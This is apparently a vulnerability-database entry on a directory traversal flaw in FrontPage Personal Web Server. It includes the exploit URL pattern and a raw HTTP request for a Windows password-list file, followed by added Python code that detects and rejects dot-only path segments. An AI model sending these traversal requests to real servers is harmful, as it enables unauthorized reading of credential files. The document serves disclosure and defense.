Microsoft FrontPage PWS Directory Traversal

Against

FrontPage Personal Web Server on Windows

IDs

CVE: CAN-2000-0153
Bugtraq: 989

Category

Input validation error

Effect

Unauthorized file access

Source

Packetstorm, Bugtraq

Description

Description: Double-dot bug in FrontPage Personal Web Server.

Compromise: Accessing the drive through a browser.

Vulnerable Systems: Frontpage-PWS32/3.0.2.926; other versions not tested.

Details:

When FrontPage-PWS runs a site on your c:\ drive, your drive could be accessed by any user accessing your page, simply by requesting any file in any directory except the files in the FrontPage directory, especially /_vti_pvt/.

How to exploit this bug?

Simply add /..../ in the URL address bar.

http://www.target.com/....//

So by requesting http://www.target.com/..../Windows/Admin.pwl the web server lets us download the .pwl file from the target.

Files and directories with the hidden attribute set are vulnerable.

Solution:

The best solution is installing FrontPage on a drive that doesn't contain private information.

Greetings, Jan van de Rijt aka The Warlock.

Attack string

GET /..../Windows/Admin.pwl HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.2; Linux) (KHTML, like Gecko)
Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5
Accept-Language: en
Host: www.i-pi.com
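The request above is the only artifact this entry gives, so the following added example (written for this page, not code from the advisory author or from the i-pi database) shows the defender's side of the same exchange: a small detector that pulls request lines out of a log, flags any path segment made only of dots (which covers the standard ".." and the "...." form this advisory relies on, in plain, percent-encoded and backslash-separated spellings), and a document-root resolver of the kind a server should have used instead of relying on the drive layout recommended in the Solution. The sample request lines, the document root /srv/www and the function names are constructed for the example; the advisory does not describe how PWS actually parsed "....", so the detector simply treats every dot-only segment as a traversal attempt.

```python
import os
import re
from urllib.parse import unquote

# A path segment consisting only of two or more dots: matches ".." as well as
# the "...." variant reported against FrontPage PWS (assumption: treat both alike).
DOT_SEGMENT = re.compile(r"^\.{2,}$")

# Request line of an HTTP/1.x message, e.g. "GET /..../Windows/Admin.pwl HTTP/1.1".
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/\d\.\d$")


def decode_path(raw_path: str) -> str:
    """Percent-decode until the text stops changing (bounded to 3 rounds), so
    %2e%2e and double-encoded %252e%252e are both seen as dots."""
    path = raw_path
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def traversal_segments(raw_path: str) -> list:
    """Return the dot-only segments found in a request path (empty if none)."""
    path = decode_path(raw_path.split("?", 1)[0])  # ignore the query string
    path = path.replace("\\", "/")                 # Windows file APIs accept '\' too
    return [seg for seg in path.split("/") if DOT_SEGMENT.match(seg)]


def scan_requests(lines) -> list:
    """Return (line_no, path, segments) for each request line that carries
    a dot-only segment; lines that are not request lines are skipped."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.match(line.strip())
        if not m:
            continue
        segs = traversal_segments(m.group("path"))
        if segs:
            hits.append((n, m.group("path"), segs))
    return hits


def safe_resolve(docroot: str, raw_path: str):
    """Map a request path onto the filesystem and refuse anything that would
    leave docroot. Returns the absolute target path, or None to reject.
    This is the check whose absence the advisory describes; it is an added
    illustration, not PWS code."""
    if traversal_segments(raw_path):
        return None                                  # reject dot-only segments outright
    rel = decode_path(raw_path.split("?", 1)[0]).replace("\\", "/").lstrip("/")
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, rel))
    # Second line of defence: even a path without dot segments must resolve under root.
    if os.path.commonpath([root, target]) != root:
        return None
    return target


# Constructed sample request lines (not taken from a real log): benign requests
# mixed with the advisory's pattern and two encoded spellings of it.
SAMPLE_REQUESTS = [
    "GET /index.htm HTTP/1.0",
    "GET /..../Windows/Admin.pwl HTTP/1.1",
    "GET /about/./team.htm HTTP/1.0",
    "GET /%2e%2e%2e%2e/Windows/Admin.pwl HTTP/1.0",
    "GET /images/..%5c..%5creadme.txt HTTP/1.0",
    "GET /docs/file...txt HTTP/1.0",
]

if __name__ == "__main__":
    for n, path, segs in scan_requests(SAMPLE_REQUESTS):
        print(f"line {n}: {path!r} -> dot-only segments {segs}")
    print("resolve /index.htm:", safe_resolve("/srv/www", "/index.htm"))
    print("resolve attack path:", safe_resolve("/srv/www", "/..../Windows/Admin.pwl"))
```

The detector deliberately ignores single-dot segments and dots inside a file name (file...txt), so it does not flood on ordinary traffic, while the resolver rejects every dot-only segment rather than trying to normalise it; that also refuses a harmless /a/../b, which is an acceptable cost for a server that should never need parent references in a URL.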

Attack program source

None available.